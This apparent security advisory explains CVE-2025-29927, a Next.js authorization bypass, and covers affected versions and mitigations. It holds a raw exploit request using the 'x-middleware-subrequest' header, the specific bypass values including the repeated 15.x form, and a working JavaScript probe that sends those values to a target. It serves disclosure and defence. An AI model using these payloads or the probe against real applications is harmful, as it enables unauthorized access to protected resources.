Next.js Middleware Authorization Bypass CVE-2025-29927 - Checkmarx Zero

Behind the Middleware Curtain — Explaining CVE-2025-29927, A Critical Authorization Bypass in Next.js


March 25, 2025

Zhero Web Security discovered an authorization bypass in the popular Next.js full-stack web framework; essentially, this bypass, which affects years of Next.js versions, allows an adversary to bypass permissions by “asking nicely” — specifically, by including a specially-crafted header in web requests to affected applications. 

  • No official CVSS base score has been calculated at the time of our analysis. Checkmarx Zero’s internal estimate, using CVSSv4, places the likely base score in the range 9.2–9.9. The reporter suggests a CVSSv3 base score of 9.1
  • Exploitation of this issue is extremely simple, and is likely to be automated by adversaries 
  • This issue is resolved by upgrading Next.js, and can be mitigated in the meantime by blocking any public request that carries the `x-middleware-subrequest` header; this can be done with a Web Application Firewall (WAF), application or web server rules, etc.
  • You are potentially affected if you use Next.js and you rely on Next.js “middleware” to check authentication or authorization, or for any other security purpose. Checkmarx Zero has found affected versions in addition to those listed in the CVE advisory. We consider the following versions affected: Next.js 11.1.4 through 12.3.5, 13.x prior to 13.5.9, 14.x prior to 14.2.25, 14.3.0-canary.0 through 14.3.0-canary.87, 15.x prior to 15.2.3, and 15.3.0-canary.0 through 15.3.0-canary.11

Overview and Summary of CVE-2025-29927

Next.js is a popular full-stack web development framework based on React; it allows rapid building of web applications using Javascript. 

Recently, a critical security vulnerability (CVE-2025-29927) was reported affecting Next.js applications prior to versions 14.2.25 and 15.2.3. Checkmarx Zero’s further analysis of the vulnerability finds additional affected versions: 11.1.4 through 12.3.5, 13.x prior to 13.5.9, 14.x prior to 14.2.25, 14.3.0-canary.0 through 14.3.0-canary.87, 15.x prior to 15.2.3, and 15.3.0-canary.0 through 15.3.0-canary.11.

This vulnerability allows attackers to bypass authorization checks performed within middleware, potentially enabling unauthorized access to sensitive application resources. Middleware is the code that runs on each incoming request before it reaches the application proper, handling concerns such as authentication, authorization, logging and request rewriting; this is why it plays a pivotal role in the security of Next.js applications. 

Middleware is used heavily in modern web application development, especially for authentication and authorization, which is why CVE-2025-29927 is so dangerous. At its core it is an authorization bypass: anyone can use it to skip an application’s middleware, and authorization checking is one of the most common jobs given to that middleware. 

The vulnerability exploits the way Next.js handles the HTTP request header `x-middleware-subrequest`. Attackers craft requests with this header set to the internal identifier of the middleware they want to skip (often `middleware` or `src/middleware`, but it depends on the Next.js version and project layout), which tricks the framework into skipping that middleware’s logic. By doing so, attackers effectively bypass the protections it implements and gain unauthorized access to restricted parts of the application. Essentially, an adversary can bypass middleware-based authorization “guards” by simply asking politely; it’s like getting into an exclusive club by saying “pretty please?” to the door person! 

[Image: “Cute Cat Standing” meme, captioned with the `x-middleware-subrequest` header used to exploit the bypass]
All it takes to bypass authorization in vulnerable Next.js apps

The impact of such a vulnerability is significant in today’s landscape, where JavaScript frameworks are ubiquitous — in fact, Next.js is the fourth most popular web development framework in the world according to StackOverflow’s 2024 popularity survey.  Next.js is the #1 Javascript meta-framework, boasting over 130,000 stars on GitHub, making it the 14th largest project on the entire platform. 

The reporter of this vulnerability proposes a CVSSv3 base score of 9.1 (Critical) and reports it affects Next.js versions prior to 14.2.25 and 15.2.3; however Checkmarx Zero’s additional analysis of the vulnerability finds additional affected versions: 11.1.4 through 12.3.5, 13.x prior to 13.5.9, 14.x prior to 14.2.25, 14.3.0-canary.0 through 14.3.0-canary.87, 15.x prior to 15.2.3, and 15.3.0-canary.0 through 15.3.0-canary.11. 

How The Next.Js Middleware Bypass Gets Exploited 

The key to understanding this vulnerability is understanding the Next.js concept of “middleware”. Next.js applications use components to process incoming requests (which browsers and API clients make on behalf of users) and make various decisions about them before passing them on to the core of the application. These components are called “middleware” in the Next.js framework. One very common use of middleware is to determine whether a given user is authorized to make the request. For example, an application would have a middleware component examine whether a user has a valid session and belongs to an administrator group before allowing a request to the admin control panel portion of the application. 

This vulnerability allows an adversary to bypass those kinds of checks. 

The issue arises from how Next.js processes a specific HTTP header called `x-middleware-subrequest`. Under normal circumstances this header is managed internally by Next.js to track sub-requests made from within middleware, but by manually including it in an ordinary external request an attacker can trick Next.js into skipping the current middleware, such as an authorization checker, entirely. This is done by setting the header’s value to the internal name of the middleware, for example `pages/_middleware` on the older `pages/_middleware` file layout, or `middleware` (or `src/middleware`) on the current `middleware` file layout; on 15.x the name has to be repeated, separated by colons, because that version only skips the middleware once the number of occurrences reaches its recursion limit. These values come from the internal logic by which middleware is processed under the hood. 

[Figure 1 – Vulnerable code in next-server, sourced from the Zhero Security blog post on this vulnerability]

In Next.js, the middleware sits in the path of incoming HTTP requests and acts like a gatekeeper. It examines each request before it reaches other parts of the application, checking that the request is legitimate and safe, that the user has the correct permissions, or simply that the request follows whatever conventions the middleware enforces. This gatekeeper role means middleware is often used to check authentication and authorization, among other security checks. The vulnerability occurs because Next.js tries to detect and prevent infinite loops caused by middleware repeatedly invoking itself, using the `x-middleware-subrequest` header as an internal indicator that a request is such a sub-request. Unfortunately, because Next.js trusts this header even when it arrives from the outside, an attacker can simply set it explicitly on a malicious request, tricking the server into assuming the request has already been through the middleware and bypassing its checks entirely. 

Imagine the middleware as a security guard at the entrance to an exclusive event, carefully checking every guest’s invitation (their authorization cookies, for example). Now imagine that someone confidently walks in holding up a badge that says “I’ve already been checked” (the `x-middleware-subrequest` header) and strolls right past security. That is exactly what happens here: by exploiting the framework’s trust in its own internal signal, `x-middleware-subrequest`, the attacker gets past the guard without any actual verification of their credentials. 

GET /admin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: some-vulnerable-nextjs-app[.]com
x-middleware-subrequest: pages/_middleware
Above: request headers that attempt to exploit this vulnerability to access an admin page
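To make the mechanism concrete, here is an added example in plain JavaScript. It is not Next.js source and not code from Checkmarx Zero or Zhero; it models the skip decision the affected server makes before running a middleware, a sample authorization guard of the kind described above, and the edge-blocking mitigation from the summary. The function names, the `/admin` path, the `role` cookie and the sample requests are this example’s own. The 15.x branch, which counts occurrences of the middleware name against a recursion limit of five, reflects the vulnerable source of that release line rather than anything stated on this page.

```javascript
// Added example (not Next.js, Checkmarx or Zhero code): a reduced model of
// the vulnerable skip decision, a sample auth guard, and the edge mitigation.

const HEADER = 'x-middleware-subrequest';
// Next.js 15.x only skips a middleware once it believes the request has
// already recursed through it this many times (vulnerable-source behaviour).
const MAX_RECURSION_DEPTH = 5;

// Models the vulnerable skip decision. `majorVersion` selects which check the
// affected server performs: pre-15 releases skip as soon as the middleware
// name appears anywhere in the colon-separated header value; 15.x counts
// occurrences and skips once the count reaches MAX_RECURSION_DEPTH.
// `headers` is assumed lower-cased, as Node's IncomingMessage.headers is.
function middlewareIsSkipped(headers, middlewareName, majorVersion) {
  const raw = headers[HEADER];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  if (majorVersion >= 15) {
    const depth = subrequests.filter((name) => name === middlewareName).length;
    return depth >= MAX_RECURSION_DEPTH;
  }
  return subrequests.includes(middlewareName);
}

// Sample guard (hypothetical): any path under /admin requires a session
// cookie `role=admin`; everything else passes through. It returns a plain
// decision instead of a NextResponse so it can run outside Next.js.
function adminGuard(request) {
  const isAdminPath = request.pathname.startsWith('/admin');
  const role = (request.cookies || {}).role;
  if (isAdminPath && role !== 'admin') {
    return { action: 'redirect', location: '/login' };
  }
  return { action: 'next' };
}

// The server's request path as in the affected versions: consult the skip
// decision first, and only then run the guard.
function handleRequest(request, middlewareName, majorVersion) {
  if (middlewareIsSkipped(request.headers, middlewareName, majorVersion)) {
    return { action: 'next', skippedMiddleware: true };
  }
  return { ...adminGuard(request), skippedMiddleware: false };
}

// Edge-side mitigation from the summary: no external request has a reason to
// carry the internal header, so a WAF or proxy rule rejects any that does.
// Header names are matched case-insensitively since proxies may not normalise.
function blockedAtEdge(headers) {
  return Object.keys(headers).some((name) => name.toLowerCase() === HEADER);
}

// Constructed requests: an anonymous client hitting /admin without the header,
// with the bare name (enough before 15.x), and with the name repeated five
// times (what 15.x requires).
const anonymous = { pathname: '/admin', cookies: {}, headers: {} };
const crafted14 = { ...anonymous, headers: { [HEADER]: 'middleware' } };
const crafted15 = {
  ...anonymous,
  headers: { [HEADER]: Array(MAX_RECURSION_DEPTH).fill('middleware').join(':') },
};

console.log(handleRequest(anonymous, 'middleware', 14)); // redirect to /login
console.log(handleRequest(crafted14, 'middleware', 14)); // next: middleware skipped
console.log(handleRequest(crafted14, 'middleware', 15)); // redirect: one occurrence is below the limit
console.log(handleRequest(crafted15, 'middleware', 15)); // next: middleware skipped
console.log(blockedAtEdge(crafted15.headers)); // true: the edge rule would have refused it
```

Two things worth noticing when you run it: the header value has to name the middleware exactly as the framework knows it (`middleware` does nothing for a project whose middleware is registered as `src/middleware`), and the edge rule is deliberately blunt, because legitimate sub-requests never originate from the public side of the proxy.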

The original issue reporters have an excellent, technical walkthrough of this vulnerability and attack tactic on their blog

Are You Affected? 

Use the Checkmarx Software Composition Analysis (SCA) tool to quickly identify any of your code projects that are affected by CVE-2025-29927, check for vulnerable Next.js versions, and guide you through remediation steps to secure your applications. 

The team at ProjectDiscovery has also released a free Nuclei template that anyone can use to check if your applications are affected by this vulnerability.  This works by checking the versions of Next.js that are in use in your application and flagging them accordingly. 
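Version checks are the reliable first step, but if you want to confirm behaviour against a running deployment (a staging copy of your own application, not someone else’s), a differential request check is the natural complement. The following is an added example, not the Nuclei template and not Checkmarx Zero or Next.js code: it requests a protected path once without the header and once with each candidate value, and flags the target only if a path that normally denies anonymous access starts answering 200. The target hostname, the `/admin` path and the fake server used to run it offline are constructed for illustration; the candidate header values are the middleware names discussed above, including the repeated form 15.x requires.

```javascript
// Added example (not ProjectDiscovery, Checkmarx or Next.js code): an active,
// differential probe for the middleware bypass. `fetchImpl` is injectable so
// the logic can run offline against the constructed fake at the bottom.

const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Candidate values, in the order tried. Pre-15 servers skip on the bare
// middleware name; 15.x needs the name repeated to its recursion limit (5).
const CANDIDATE_VALUES = [
  'pages/_middleware',
  'middleware',
  'src/middleware',
  Array(5).fill('middleware').join(':'),
  Array(5).fill('src/middleware').join(':'),
];

// Keep only what the comparison needs from a fetch Response (or a fake with
// the same shape: a numeric `status` and `headers.get`).
function summarize(response) {
  return { status: response.status, location: response.headers.get('location') || '' };
}

// A protected path normally answers a redirect (to login), 401 or 403 for an
// anonymous client. If the same path answers 200 once the header is added,
// the middleware that produced the denial was skipped.
function looksBypassed(baseline, probe) {
  const baselineDenied =
    baseline.status === 401 ||
    baseline.status === 403 ||
    (baseline.status >= 300 && baseline.status < 400);
  return baselineDenied && probe.status === 200;
}

// Pure classification step, kept separate from I/O so it is easy to test.
// `probes` is an array of { value, response } pairs in the order they were sent.
function findBypass(baseline, probes) {
  if (baseline.status === 200) {
    return { vulnerable: false, reason: 'path is not protected; choose one that denies anonymous access' };
  }
  for (const { value, response } of probes) {
    if (looksBypassed(baseline, response)) {
      return { vulnerable: true, headerValue: value };
    }
  }
  return { vulnerable: false, reason: 'no candidate value skipped the middleware' };
}

// Sends the baseline request and one request per candidate value, never
// following redirects (a redirect to /login is the signal we want to see).
async function probeTarget(baseUrl, protectedPath, fetchImpl = fetch) {
  const url = new URL(protectedPath, baseUrl).toString();
  const opts = { redirect: 'manual' };
  const baseline = summarize(await fetchImpl(url, opts));
  const probes = [];
  for (const value of CANDIDATE_VALUES) {
    const response = await fetchImpl(url, { ...opts, headers: { [SUBREQUEST_HEADER]: value } });
    probes.push({ value, response: summarize(response) });
  }
  return { ...findBypass(baseline, probes), baseline, probes };
}

// Constructed stand-in for a vulnerable 14.x app: anonymous /admin redirects
// to /login, but the bare middleware name in the header yields 200. It is a
// fake for offline demonstration, not a real server.
function fakeVulnerableFetch(url, opts = {}) {
  const value = (opts.headers || {})[SUBREQUEST_HEADER];
  const bypass = typeof value === 'string' && value.split(':').includes('middleware');
  const headers = new Map(bypass ? [] : [['location', '/login']]);
  return Promise.resolve({ status: bypass ? 200 : 307, headers });
}

// Hypothetical target; swap in your own staging host and a real fetch.
probeTarget('https://some-vulnerable-nextjs-app.example', '/admin', fakeVulnerableFetch)
  .then((result) => console.log(result)); // vulnerable: true, headerValue: 'middleware'
```

The check is deliberately conservative: a path that already returns 200 anonymously tells you nothing, and a 200 on the probe is only meaningful when the baseline was a denial. Run it only against systems you are authorised to test.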
